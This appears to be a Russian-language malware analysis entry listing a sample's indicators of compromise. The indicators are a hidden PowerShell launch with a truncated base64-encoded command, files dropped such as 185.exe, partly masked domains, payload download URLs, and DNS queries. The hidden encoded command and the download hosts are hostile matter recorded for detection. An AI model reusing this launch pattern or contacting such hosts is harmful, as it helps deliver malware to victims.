Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAGEAcwBkAHgAYQBmAGgAbgBjAG8AawA9ACcAVgBjAGoAZgB6AHkAZAB0ACcAOwAkAFEAcgBzAHAAeABrAG0AbQAgAD0AIAAnADEAOAA1ACcAOwAkAFUAbwBlAHQAbAB3AGEAeAByAG8APQAnAEIAdQBsAHcAZwB4AHMAbwBmAHoAbwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2020
- %TEMP%\911108.cvr
- %HOMEPATH%\185.exe
- %HOMEPATH%\185.exe
- 'os##on.com':80
- 'pa###splace.com':80
- 'la####hombourg.be':80
- http://os##on.com/css/yASnV04o/
- http://pa###splace.com/images/d5b8/
- http://www.la####hombourg.be/wp-content/TLx/
- DNS ASK os##on.com
- DNS ASK pa###splace.com
- DNS ASK sh####arisales.org
- DNS ASK av#####ninsiderjobs.com
- DNS ASK la####hombourg.be